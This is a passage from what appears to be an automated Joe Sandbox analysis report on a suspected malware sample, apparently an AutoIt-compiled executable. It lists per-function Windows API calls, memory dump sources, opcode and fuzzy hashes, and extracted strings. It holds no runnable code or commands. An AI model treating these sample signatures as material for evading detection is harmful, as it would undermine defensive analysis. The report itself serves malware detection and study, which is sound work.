                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1396898556-0
                                                                                                                            • Opcode ID: 33665428c7dc19dab9976f21bb865ffc9fed13809a78aa3f012f6d3daa088bf5
                                                                                                                            • Instruction ID: 731630fd8f92daf5d632e2583c3635d0b49ff1c672157aa852c2981855462b54
                                                                                                                            • Opcode Fuzzy Hash: 33665428c7dc19dab9976f21bb865ffc9fed13809a78aa3f012f6d3daa088bf5
                                                                                                                            • Instruction Fuzzy Hash: B911E331600205ABCF18FF70C816FEEB7A9AF45710F10882DF542E7181DA719A41BB91
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: 9547fb591bf2ece31a4c13afb0c324357eb066bb32412995e131b7db9b4b20fa
                                                                                                                            • Instruction ID: 873e9b79e75c50c9133a5501eb7d409dcd6015df53d7da78c92140e0048fee59
                                                                                                                            • Opcode Fuzzy Hash: 9547fb591bf2ece31a4c13afb0c324357eb066bb32412995e131b7db9b4b20fa
                                                                                                                            • Instruction Fuzzy Hash: 9C2155B4608301DFCB14DF24C454B5ABBE1BF89314F15886CF89A87722D731E849EB92
                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00C156A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C15C16
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 02e446a4f180a6092ce3e5a44bf07f3c0387d1e6bda03c21753a6edfbfd9208d
                                                                                                                            • Instruction ID: 39146d687903700fe363cda95482a4463af80519ed03d56d13d70a17f64b7619
                                                                                                                            • Opcode Fuzzy Hash: 02e446a4f180a6092ce3e5a44bf07f3c0387d1e6bda03c21753a6edfbfd9208d
                                                                                                                            • Instruction Fuzzy Hash: C6113A31204B04DFD3208F19C880BA6B7E4FF85764F10C92EE9AA86A51D771E985DBA0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                                                                                                                            • Instruction ID: b7487b5f99143b56668e7a61518451bacae2f370fa8f02f355a195c321c48283
                                                                                                                            • Opcode Fuzzy Hash: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                                                                                                                            • Instruction Fuzzy Hash: 65018FB9600902EFC705EB29C491D66F7A9FF8A3107244569E869C7702DB35EC21DBE0
                                                                                                                            APIs
                                                                                                                            • __lock_file.LIBCMT ref: 00C348A6
                                                                                                                              • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2597487223-0
                                                                                                                            • Opcode ID: 7431f17f5eefbc7ffaeb1a581597cb945b98019d3e1d767f528bf5654bb87d16
                                                                                                                            • Instruction ID: 18909f41d6f33deae71141aeb0a92df86907a23f59e01c44ee651a72bac60ec2
                                                                                                                            • Opcode Fuzzy Hash: 7431f17f5eefbc7ffaeb1a581597cb945b98019d3e1d767f528bf5654bb87d16
                                                                                                                            • Instruction Fuzzy Hash: B5F0CD31921709EBDF15AFB4CC067EE36A0EF01329F158418F424EA1D1CBB89A55EF92
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(?,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E7E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: b14040078d43567fe94897caa5f910b4b1e1f5bce0b253c235faa3aae0ccf30e
                                                                                                                            • Instruction ID: 4e6377be110e0a6cd690a77189f7dd797b02404f3f73ff0b207ae1a1b0492d1b
                                                                                                                            • Opcode Fuzzy Hash: b14040078d43567fe94897caa5f910b4b1e1f5bce0b253c235faa3aae0ccf30e
                                                                                                                            • Instruction Fuzzy Hash: 75F03075501711CFCB389F65E494856FBE1BF15325310893EE1E682620C7319880EF80
                                                                                                                            APIs
                                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongNamePath_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2514874351-0
                                                                                                                            • Opcode ID: c37a2d640d928be705ec836ec6fac1dc11916c0c103cb2a5d6d10632154f69d2
                                                                                                                            • Instruction ID: 3e117bb9e2d2563923512c394ae670ac06dbb257d2a3c6a49fafe9ffb848df66
                                                                                                                            • Opcode Fuzzy Hash: c37a2d640d928be705ec836ec6fac1dc11916c0c103cb2a5d6d10632154f69d2
                                                                                                                            • Instruction Fuzzy Hash: C4E0CD3690412857C720D6599C05FEA77EDDF897A0F0841B6FC0CD7205D9609CC096D0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2638373210-0
                                                                                                                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                            • Instruction ID: 63ef4d086802650504bd97e74a841d29bcfc76addd20adbc538aa8a52e5f1a5b
                                                                                                                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                            • Instruction Fuzzy Hash: D7E092B0204B005BD7388A24D801BE377E1AB05304F00081DF2AAC3241EB6278458759
                                                                                                                            APIs
                                                                                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00C4DD42,?,?,00000000), ref: 00C15C5F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 973152223-0
                                                                                                                            • Opcode ID: f914e046b6292216b8a9e386c4663355492030403bcded947756e6877b6b2a3b
                                                                                                                            • Instruction ID: 03aead5ea716694c64ae05d8e1aff65d3090e75ac90394abbc456d8eb38106c4
                                                                                                                            • Opcode Fuzzy Hash: f914e046b6292216b8a9e386c4663355492030403bcded947756e6877b6b2a3b
                                                                                                                            • Instruction Fuzzy Hash: 88D0C77464020CBFEB10DB80DC46FAD777CD705710F100195FD0496290D6B27D508795
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                            • Instruction ID: 09f452629cc55e77dcd581e9b2518bfa190a673cf9f64e3d2c5508c4cb295323
                                                                                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                            • Instruction Fuzzy Hash: F2B0927644020C7BCE012A82EC02A4A3B199B41764F408020FB0C18162A673E664AA89
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 00C7D1FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1452528299-0
                                                                                                                            • Opcode ID: ecca68ed9b384e67438c305e9995aaca32702a6af7558a6bf6055efca7c4d58f
                                                                                                                            • Instruction ID: 0df7a3575e55acc324194f3975d8980ad96d2a2fc65973d95e9e370d0d008973
                                                                                                                            • Opcode Fuzzy Hash: ecca68ed9b384e67438c305e9995aaca32702a6af7558a6bf6055efca7c4d58f
                                                                                                                            • Instruction Fuzzy Hash: 8C7141306043018FD714EF64C491AAEB7F4AF85314F54856DF89A9B3A2DB30ED46EB52
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 01027291
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                            • Instruction ID: d0d9701c17fe1802e17fabec89fd5bb6a1fb2ef3e284b5bc09d6b17f4a0f963e
                                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                            • Instruction Fuzzy Hash: D0E0E67494110DDFDB00EFB4D9496DE7FB4EF04301F100161FD01D2281D6309D508A62
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C9CB37
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CB95
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C9CBD6
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CC00
                                                                                                                            • SendMessageW.USER32 ref: 00C9CC29
                                                                                                                            • _wcsncpy.LIBCMT ref: 00C9CC95
                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C9CCB6
                                                                                                                            • GetKeyState.USER32(00000009), ref: 00C9CCC3
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CCD9
                                                                                                                            • GetKeyState.USER32(00000010), ref: 00C9CCE3
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CD0C
                                                                                                                            • SendMessageW.USER32 ref: 00C9CD33
                                                                                                                            • SendMessageW.USER32(?,00001030,?,00C9B348), ref: 00C9CE37
                                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C9CE4D
                                                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C9CE60
                                                                                                                            • SetCapture.USER32(?), ref: 00C9CE69
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00C9CECE
                                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C9CEDB
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C9CEF5
                                                                                                                            • ReleaseCapture.USER32 ref: 00C9CF00
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C9CF3A
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C9CF47
                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9CFA3
                                                                                                                            • SendMessageW.USER32 ref: 00C9CFD1
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D00E
                                                                                                                            • SendMessageW.USER32 ref: 00C9D03D
                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C9D05E
                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C9D06D
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C9D08D
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C9D09A
                                                                                                                            • GetParent.USER32(?), ref: 00C9D0BA
                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9D123
                                                                                                                            • SendMessageW.USER32 ref: 00C9D154
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00C9D1B2
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C9D1E2
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D20C
                                                                                                                            • SendMessageW.USER32 ref: 00C9D22F
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00C9D281
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C9D2B5
                                                                                                                              • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C9D351
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                            • API String ID: 3977979337-4164748364
                                                                                                                            • Opcode ID: 242ec7f88829f2d4dfddb0c51ad016edd6c41964f054d48126c707d007da9e7f
                                                                                                                            • Instruction ID: d80700e1270451c32d106ff00ec9ef442d7a25fd949a56f823bf5974c0732737
                                                                                                                            • Opcode Fuzzy Hash: 242ec7f88829f2d4dfddb0c51ad016edd6c41964f054d48126c707d007da9e7f
                                                                                                                            • Instruction Fuzzy Hash: 44428974204281AFDB20CF24C888BAABBE5FF49350F14055EF6A6D72B1C731D951EB52
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                            • API String ID: 1357608183-1798697756
                                                                                                                            • Opcode ID: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
                                                                                                                            • Instruction ID: 3fb9ba030af071a5dcdb016f63b5607a2684a86837d883f94440849b9610ec54
                                                                                                                            • Opcode Fuzzy Hash: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
                                                                                                                            • Instruction Fuzzy Hash: E193BF75E04229DFDB24CF98D8C1BADB7B1FF48310F24816AE955AB281E7709E81DB50
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00C148DF
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4D665
                                                                                                                            • IsIconic.USER32(?), ref: 00C4D66E
                                                                                                                            • ShowWindow.USER32(?,00000009), ref: 00C4D67B
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00C4D685
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4D69B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C4D6A2
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4D6AE
                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6BF
                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6C7
                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C4D6CF
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00C4D6D2
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6E7
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00C4D6F2
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6FC
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00C4D701
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D70A
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00C4D70F
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D719
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00C4D71E
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00C4D721
                                                                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00C4D748
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
